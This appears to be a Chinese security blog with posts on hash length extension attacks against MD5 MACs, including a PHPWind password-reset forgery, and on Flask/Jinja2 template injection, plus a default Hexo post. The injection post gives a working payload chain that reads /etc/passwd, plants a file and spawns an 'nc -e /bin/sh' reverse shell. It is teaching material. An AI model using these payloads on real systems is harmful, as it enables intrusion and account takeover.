Klaus' blog

Web中的密码学之哈希长度扩展攻击

2017-05-07T08:50:07.000Z

0x01 攻击场景

哈希长度扩展攻击(Hash Length Extension Attacks)用于攻击MAC计算方式为 $MAC = H($secret, $message) 的情况. 其中 H() 为hash函数, $secret为保存在服务器上的秘密信息. 当这里hash函数为 MD4 MD5 SHA-0 SHA-1 SHA-256 SHA-512 等基于MD结构的算法时. 我们就可以在知道 $secret 长度和一组 $message $MAC 的情况下构造出 $message + padding + $yourmessage 的hash从而绕过服务器上的某些验证.

0x02 Message Authentication Code(MAC)

在密码学中, 消息认证码(MAC)用于保证消息的完整性(integrity)和真实性(authenticity).

(图片来自维基百科)

上图展示了通过MAC认证消息的过程, 可以看得出MAC是通过MAC算法, 密钥和消息三者生成的, 但通常情况下常用MD5, SHA等hash算法来作MAC算法, 也就是文章开头的$H(). Web中常见的情况是服务器充当上图中的两者, 服务器对认证过的请求计算一次MAC传递给用户, 所以在服务器端只要验证用户提交的MAC与计算出的请求的MAC是否相等, 就能判别用户的请求是否合法.

0x03 Merkle–Damgård(MD)结构

由于现在很多Web服务中使用基于MD结构的hash函数作为MAC算法, 所以这就不可避免地引入了哈希长度扩展攻击的风险.

在进行哈希长度拓展攻击之前, 我们先要了解一下什么是MD结构.

(图片来自维基百科)

如上图, MD算法简单来说有以下几步:

1. 首先把要加密的消息按照固定的长度分成若干个块, 对最后一个块进行长度补足
2. 将第一个消息块和一个初始化向量IV(与具体的算法与实现有关)做一个复杂的运算f得出一个结果
3. 将上面的结果作为下一次运算f的输入向量, 并与下一个消息块进行复杂运算f, 以此类推
4. 将最后一个消息块运算后的结果进行一些处理(常是压缩函数)得出最后的结果.

明白的MD算法的流程, 我们就会想到这样一个问题: 如果我们可以获得一段消息最终的hash, 那我们就可以在原消息后面附加任意的数据并计算出同样合法的hash. 因为每一次运算只依赖上一次的结果, 与之前的运算没有关联.

0x04 构造扩展消息

下面就让我们以下面这段代码为例, 来构造恶意的扩展消息绕过服务器端的逻辑


	$secret = 'ABCDEFG';
	if(!(isset($_GET['mac']) && isset($_GET['request']))){
      die("error");
	}
	$mac = $_GET['mac'];
	$message = $_GET['request'];
	if($mac === md5($secret . $message)){
      die("success");
	}
?>

在构造消息之前, 我们还要了解一下MD5, MD5算法简单来说一共有三步:

1. 补位
2. 补长度
3. 计算消息摘要

首先MD5要求消息长度必须符合满足 N ≡ 448 (mod 512), 即N % 512 = 448. 不足448的需要用1后面加0来补足448比特, 但是需要注意的是MD5补位的范围为 1~512, 所以补位操作是必须的, 即使原始消息长度正好满足条件, 也要补位512比特. 补位完成后, 还要在补位过消息后面附加64比特的长度信息. 长度紧随其后, 之后的比特用0填充.

下面来演示一下如何构造MD5的扩展消息

假设我们有消息I am Bob, 那么实际在服务器端被MD5计算的数据是:

图中红色的部分为服务器端合成的消息(即$secret + $message), 绿色部分为用1加上0的填充部分(8个bit一个字节, 所以10000000 0000……..在16进制编辑器中为80 00 00 ……..), 蓝色部分为补位消息后附加的长度信息, 补位前消息为15个字节, 120比特, 转换成16进制为0x78.

我们计算一下ABCDEFGI am Bob的MD5

根据前面所说的MD算法的特点, 每个数据块的计算只依赖与上一个数据块计算的结果, 那么现在我们已经知道了第一个数据块, 计算的结果, 那么我们直接再该数据块后附加数据就可以继续该计算, 比如我们在第一个消息块后面附加消息I am Alice, 如下图所示

(图中箭头上的值并不是实际算法中直接代入下一轮计算中的值, 我们无需关心计算细节, 这里只是想表达每一轮计算产生的hash值是下一轮计算的输入; 最左边的ABCD为MD5算法固定的初始化向量)

我们要注意的很关键的一点是这里的附加消息是附加在第一个消息块后面, 也就是要保证我们附加的消息在下一个消息块开头(这就是为什么我们必须知道服务器端$secret长度的原因), 这样我们才能利用上一个消息块计算的结果去继续计算.

现在我们根据已有的消息I am Bob和其摘要2229cbfa1981495d6fb63a854461b923自己构造了一段消息

并能在不知道$secret的情况下计算出上面这段消息的hash.

好吧该怎么计算呢, 其实我们只需要把MD5固定的初始化向量A=0x67452301;B=0xefcdab89;C=0x98badcfe;D=0x10325476换成上一次计算的hash2229cbfa1981495d6fb63a854461b923, 然后计算我们附加数据补位完成的数据块就好了.

我们这里不关心具体算法的细节, 下面介绍一个工具来帮我们完成实际的计算

0x05 利器Hashpump

hashpump是一个C++编写的用于哈希长度拓展攻击的工具, 支持CRC32, MD5, SHA1等等多种算法, 并且使用起来也非常方便.(python也有hashpump的库)

一共4个参数, 分别是-s 已知消息在服务器端生成的hash, -d已知的消息, -a想要附加的数据, -k服务器端$secret的长度. 我们用hashpump来计算一下我们上面构造的扩展消息的hash

输出有两行, 第一行是扩展消息的hash, 第二行是hashpump帮助我们构造的扩展消息.

现在我们在本地计算一下$secret 加上我们构造的扩展消息的MD5值

与hashpump计算出来的完全一样! 现在我们再那这对扩展消息和hash去验证前面给的那段php代码

成功绕过了验证.

0x06 PHPWind哈希长度扩展漏洞

也许有的同学要问了, 前面的攻击虽然能达成, 但是我们能构造的消息必须是 message + padding + attention 这种形式, 未免限制太大了. 然而, 就是这种形式的构造数据再某些特定的场合下就是能利用. 下面就来举一个PHPWind的例子.

我们新注册一个test用户, 问题出现在用户上传头像的地方

我们打开网页的源代码看到上传头像的源代码里有这么一段

网页生成了一段URL, 而这段URL里面有用于认证请求合法性的windidkey参数 7967c3eef8e0544fc7e91e686589636b

我们先找到生成这段URL的PHP代码

src/windid/service/user/srv/WindidUserService.php


public function showFlash($uid, $appId, $appKey, $getHtml = 1) {
		$time = Pw::getTime();
		$key = WindidUtility::appKey($appId, $time, $appKey, array('uid'=>$uid, 'type'=>'flash'), array('uid'=>'undefined'));
		$key2 = WindidUtility::appKey($appId, $time, $appKey, array('uid'=>$uid, 'type'=>'normal'), array());
		
		$postUrl = "postAction=ra_postAction&redirectURL=/&requestURL=" . urlencode(Wekit::app('windid')->url->base . "/index.php?m=api&c=avatar&a=doAvatar&uid=" . $uid . '&windidkey=' . $key . '&time=' . $time . '&clientid=' . $appId . '&type=flash') . '&avatar=' . urlencode($this->getAvatar($uid, 'big') . '?r=' . rand(1,99999));
		return $getHtml ? '
							'windid')->url->res . 'swf/avatar/avatar.swf?' . rand(0,9999) . '" />
							
							
							
							
							
							
							
							
							
							
							'"/>
							'windid')->url->res . 'swf/avatar/avatar.swf?' . rand(0,9999) . '" quality="high" bgcolor="#ffffff" width="700" height="430" name="mycamera" align="middle" allowScriptAccess="never" allowFullScreen="false" scale="exactfit"  wmode="transparent" FlashVars="' . $postUrl . '" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />
						'
		               : array(
		                    'width' => '500',
		                    'height' => '405',
		                    'id' => 'uploadAvatar',
		                    'name' => 'uploadAvatar',
		                    'src' => Wekit::app('windid')->url->res . 'swf/avatar/avatar.swf',
		                    'wmode' => 'transparent',
		                    'postUrl' => Wekit::app('windid')->url->base . "/index.php?m=api&c=avatar&a=doAvatar&uid=" . $uid . '&windidkey=' . $key2 . '&time=' . $time . '&clientid=' . $appId . '&type=normal&jcallback=avatarNormal',
		               		'token' => $key2,
		                );
}

可以看到URL里面的key是WindidUtility::appKey这个方法生成的, 我们跟踪到这个方法

src/windid/service/base/WindidUtility.php

public static function appKey($apiId, $time, $secretkey, $get, $post) {
		$array = array('m', 'c', 'a', 'windidkey', 'clientid', 'time', '_json', 'jcallback', 'csrf_token', 'Filename', 'Upload', 'token');
		$str = '';
		ksort($get);
		ksort($post);
		foreach ($get AS $k=>$v) {
			if (in_array($k, $array)) continue;
			$str .=$k.$v;
		}
		foreach ($post AS $k=>$v) {
			if (in_array($k, $array)) continue;
			$str .=$k.$v;
		}
		return md5(md5($apiId.'||'.$secretkey).$time.$str);
		
}

看到这里就很明显了, 这个方法生成windidkey的方式就是 md5(md5($apiId.'||'.$secretkey).$time.$str), $time 是当前的时间, $str 是将 $get 和 $post 中的值排序后拼接起来, md5($apiId.'||'.$secretkey)的长度是固定的32位, 而 $time 和 $str 又是我们可控的, 我们完全可以按照前面的方法构造新的请求并绕过windidkey的验证! 下面我们看一下具体验证请求的地方

src/applications/windidserver/api/controller/OpenBaseController.php

public  function beforeAction($handlerAdapter) {
		parent::beforeAction($handlerAdapter);
		$charset = 'utf-8';
		$_windidkey = $this->getInput('windidkey', 'get');
		$_time = (int)$this->getInput('time', 'get');
		$_clientid = (int)$this->getInput('clientid', 'get');
		if (!$_time || !$_clientid) $this->output(WindidError::FAIL);
		$clent = $this->_getAppDs()->getApp($_clientid);
		if (!$clent) $this->output(WindidError::FAIL);
		if (WindidUtility::appKey($clent['id'], $_time, $clent['secretkey'], $this->getRequest()->getGet(null), $this->getRequest()->getPost()) != $_windidkey)  $this->output(WindidError::FAIL);
		
		$time = Pw::getTime();
		if ($time - $_time > 1200) $this->output(WindidError::TIMEOUT);
		$this->appid = $_clientid;
}

绕过了这个函数的验证就可以访问PHPWind中的API, 函数的逻辑很简单, 必须有 clientid 和 time 这两个参数, 验证提交的windidkey与WindidUtility::appKey中计算的结果是否一致, 之后如果对请求生成的windidkey没有超时就返回成功.

我们只要能使请求 POST a=editUser&c=user&m=api&uid=2&password=aaabbbcc 通过windidkey的校验就可以将uid为2的用户的密码更改为aaabbbccc

我们回过头来看生成上传头像处URL的代码, 传入appKey方法中的 $get, $post 参数实际上是两个数组

array('uid'=>$uid, 'type'=>'flash') 和 array('uid'=>'undefined') 也就是说上图中的windidkey实际上是 md5($apiId.'||'.$secretkey) + "1496078639" + "typeflashuid2uidundefined" 的MD5值.

验证API请求的beforeAction函数中, 传入appKey方法中的 $get, $post 参数是实际请求URL中的参数, 需要注意的一点是appKey方法还会对去掉存在于数组 array('m', 'c', 'a', 'windidkey', 'clientid', 'time', '_json', 'jcallback', 'csrf_token', 'Filename', 'Upload', 'token') 中的键. 也就是说我们想构造的请求中只有uid和password两个参数参与. 所以我们需要附加的消息就是passwordaaabbbcccuid2

好啦, 根据我们前面的方法直接上hashpump

这里有个问题, 就是我们怎样让typeflashuid2uidundefined%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%18%02%00%00%00%00%00%00

参与到windidkey的计算中来, 因为我们用计算出的hash是整个消息

1496078639typeflashuid2uidundefined%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%18%02%00%00%00%00%00%00passwordaaabbbcccuid2

的hash. 这里有个技巧, 同时也是我认为这个洞很关键的一点, 就是我们可以传一个参数

typeflashuid2uidundefined=%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%18%02%00%00%00%00%00%00

虽然这个参数是没有功能上的作用的, 但是它还是要被后端的PHP收到, 这样经过appKey方法排序拼接过后, 被计算的消息就变成了

再附上hashpump计算出来的hash我们成功构造请求, 绕过了验证

这样我们就已经将uid为2的用户的密码修改为aaabbbccc了, 通过这种方式我们可以修改数据库中任意用户的密码, 包括管理员的. 其实这个洞不单单是能够修改密码, 通过构造不同的参数可以访问PHPWind的API中不同的逻辑. 不过那不是本文的重点了, 大家自行探究.

这个洞和原来Flicker那个洞非常类似, 都是通过计算拼接后参数的MAC来验证API请求的合法性. 然而利用哈希长度扩展攻击和URL参数的这个特性就可以伪造合法的请求.

0x07 修补方案和反思

采用MD算法的哈希函数都无法避免扩展攻击. 对于这种问题, 最好的一个解决方案就是使用将MAC算法改为HMAC算法, 即 H($secret + H($secret + $message)) 这样子的话, 一来 hash($secret + $message) 内容是不可控的, 二来其长度也是固定的, 自然也没办法扩展了. 另外如果把 $secret 放在后面 H($message + $secret), 这样我们也是没有办法做扩展攻击的.

其实想一想上面PHPWind的例子, 我们已知的消息是t开头的, 如果说我们构造的请求中在GET里有一个a开头的参数(比如app_id)那经过上面那样排序以后不可避免地app_id会落在我们t开头的消息前面, 那么这种请求实际上我们也是无法做扩展攻击的.

0x08 参考

https://en.wikipedia.org/wiki/Merkle%E2%80%93Damg%C3%A5rd_construction

http://netifera.com/research/flickr_api_signature_forgery.pdf

http://blog.csdn.net/syh_486_007/article/details/51228628

http://netsecurity.51cto.com/art/201609/517646.htm

http://blog.nsfocus.net/phpwind-hash-length-attack-hashpump-getshell/

https://www.leavesongs.com/PENETRATION/phpwind-hash-length-extension-attack.html

Flask/Jinja 模板注入

2017-04-05T18:27:50.000Z

0x00

最近看了国外几篇关于模板注入的文章, 自己也在这里加上自己的一些东西总结一下.

Server-Side Template Injection — James Kettle

Exploring SSTI in Flask/Jinja2 — Tim Tomes

Exploring SSTI in Flask/Jinja2, Part II — Tim Tomes

0x01 万恶的拼接

我们先看这段处理网站404状态的代码

@app.errorhandler(404)
def page_not_found(e):
    template = '''
{%% block body %%}
    
        Oops! That page doesn't exist.
        %s
    
 
{%% endblock %%}
''' % (request.url)
    return render_template_string(template), 404

这段代码没有从模板文件而是用 render_template_string() 直接从一个字符串渲染到了html. 从模板文件还是从字符串倒不是什么大问题, 主要是它渲染的那个字符串是和用户的输入(request.url)拼接过的. 要知道这里的 template 存的并不是纯数据而是有一部分控制功能在里面的. 这就产生了代码域与数据域的混淆, 只要出现了这样的情况十有八九就会有洞. 首先最直接的, html模板渲染到html, 插入到html就肯定会有XSS.

0x02 不仅仅是客户端

我们都知道html里面拼接数据是XSS攻击的是客户端, 然而html模板并不仅仅是html, 还有能被模板渲染引擎解释的模板代码, 这样一来我们就能插入在服务器端执行的代码. 让我们试一下

看来是可以的, 再试一个

WOW, 连secret_key都爆出来了(还记得hitcon有个题就是这个套路)

0x03 读写文件

当然, 我们的目标肯定不能止步于一个泄露出来的信息. 我们想的当然是最好能拿到一个shell.

要拿到shell, 就很难避免要执行命令, 而Jinja和Flask的template是不太可能提供这种功能的(事实上也没有), 所以在这种环境下, 肯定就要想办法调用python的 system() 或者 check_output() 之类可以执行命令的函数.

首先在Flask/Jinja的模板中, python的字符串,数字这类基本对象是肯定是支持的

其实根据以前在CTF里面的经验, 不难想到先试着调用一下这些对象的内置方法, 去看一下当前环境下能访问哪些对象 ''.__class__.__mro__[2].__subclasses__() , 或者 (1).__class__.__base__.__subclasses__()

这里还是稍微写一下, 首先 ''.__class__ 可以访问到字符串的类型对象(关于python中的类型对象参见Python Types and Objects)

因为python中所有的对象都是从Object逐级继承来的, 类型对象也不除外, 所有我们就可以调用对象的 __base__ 方法访问该对象所继承的对象

或者使用 __mro__(Method Resolution Order) 直接获得对象的继承链, python用这个方法来确定对象方法解析的顺序

当我们访问到Object的类型对象的时候, 就可以用 __subclasses__()来获得当前环境下能够访问的所有对象.

因为调用对象的 __subclasses__() 方法会返回当前环境中所有继承于该对象的对象.

我们仔细过一遍环境里面存在的对象, 首先引起我们注意的肯定就是这个python内建的file对象

至少我们能读写文件了.

''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd', 'r').read()

''.__class__.__mro__[2].__subclasses__()[40]('/tmp/test', 'w').write('AAAAAAAAAAAAAAAAAA')

但是即使可以写文件, 好像也拿不到shell, 因为这又不像是PHP, 文件或者说代码的执行我们是很难控制的.

那么就再看看别的对象, 看了一圈好像确实找不到能让我们离命令执行更进一步的对象了, 看来单纯用这种方式很难拿到shell了

0x04 沙盒逃逸

卡住了以后就按照James大佬的思路, 在我们判断出存在SSTI之后, 下一步要做的就是仔细阅读文档, 挖掘一下在当前的环境下有哪些可以利用的点

‘For Template Authors’ sections covering basic syntax.

‘Security Considerations’ - chances are whoever developed the app you’re testing didn’t read this, and it may contain some useful hints.

Lists of builtin methods, functions, filters, and variables.

Lists of extensions/plugins - some may be enabled by default.

在阅读Flask和Jinja的文档的时候, 要仔细翻的就两个部分

Jinja globals

Flask template globals

仔细翻阅之后, 我们在Flask的config对象上找到了突破点, 查看文档发现config对象有一个from_pyfile()的方法用于从.py文件中读取配置到config中. 我们去flask的源代码里仔细看一看这个函数的行为

config.py

def from_pyfile(self, filename, silent=False):
    """Updates the values in the config from a Python file.  This function
    behaves as if the file was imported as module with the
    :meth:`from_object` function.
    :param filename: the filename of the config.  This can either be an
                     absolute filename or a filename relative to the
                     root path.
    :param silent: set to ``True`` if you want silent failure for missing
                   files.
    .. versionadded:: 0.7
       `silent` parameter.
    """
    filename = os.path.join(self.root_path, filename)
    d = types.ModuleType('config')
    d.__file__ = filename
    try:
        with open(filename) as config_file:
            exec(compile(config_file.read(), filename, 'exec'), d.__dict__)
    except IOError as e:
        if silent and e.errno in (errno.ENOENT, errno.EISDIR):
            return False
        e.strerror = 'Unable to load configuration file (%s)' % e.strerror
        raise
    self.from_object(d)
    return True
def from_object(self, obj):
    """Updates the values from the given object.  An object can be of one
    of the following two types:
    -   a string: in this case the object with that name will be imported
    -   an actual object reference: that object is used directly
    Objects are usually either modules or classes.
    Just the uppercase variables in that object are stored in the config.
    Example usage::
        app.config.from_object('yourapplication.default_config')
        from yourapplication import default_config
        app.config.from_object(default_config)
    You should not use this function to load the actual configuration but
    rather configuration defaults.  The actual config should be loaded
    with :meth:`from_pyfile` and ideally from a location not within the
    package because the package might be installed system wide.
    :param obj: an import name or object
    """
    if isinstance(obj, string_types):
        obj = import_string(obj)
    for key in dir(obj):
        if key.isupper():
            self[key] = getattr(obj, key)

flask有 from_json, from_envvar, from_object, from_mapping, from_pyfile 等好几个更新配置的方法, 但是相比于其它 from_pyfile 这个方法的实现有点特殊. 我们看上面的源码, 首先新建一个module对象d, 然后把传入的文件读出来用compile()编译成exec()可以执行的code对象, 然后执行, 并且把 d.__dict__ 用作代码对象code执行的scope. 这句话可能比较抽象, 或者我说的不准确, 这里放一张调试的图, 相信大家一看就明白了

然后又将d传入了 from_object 方法, from_object 方法遍历 d.__dict__ 将键名为大写的键值对更新到当前环境的config对象中.

所以如果我们能让 from_pyfile 去读这样的一个文件

1 2	from os import system SHELL = system

那么我们访问 config['SHELL'] 时, 实际上就能访问到 system 函数了. 而我们前面又已经做到了文件读写, 所以两个点结合起来我们就完全可以拿到SHELL

我们最终的payload为

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil', 'w').write('from os import system%0aSHELL = system') }}
//写文件
{{ config.from_pyfile('/tmp/evil') }}
//加载system
{{ config['SHELL']('nc xxxx xx -e /bin/sh') }}
//执行命令反弹SHELL

0x05 参考

http://www.cafepy.com/article/python_types_and_objects/python_types_and_objects.html

http://flask.pocoo.org/docs/0.12/api/#flask.Config.from_pyfile

https://docs.python.org/3/library/types.html

https://docs.python.org/3/library/functions.html#exec

Hello World

2016-12-06T16:30:23.000Z

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

Quick Start

Create a new post

1	$ hexo new "My New Post"

More info: Writing

Run server

1	$ hexo server

More info: Server

Generate static files

1	$ hexo generate

More info: Generating

Deploy to remote sites

1	$ hexo deploy

More info: Deployment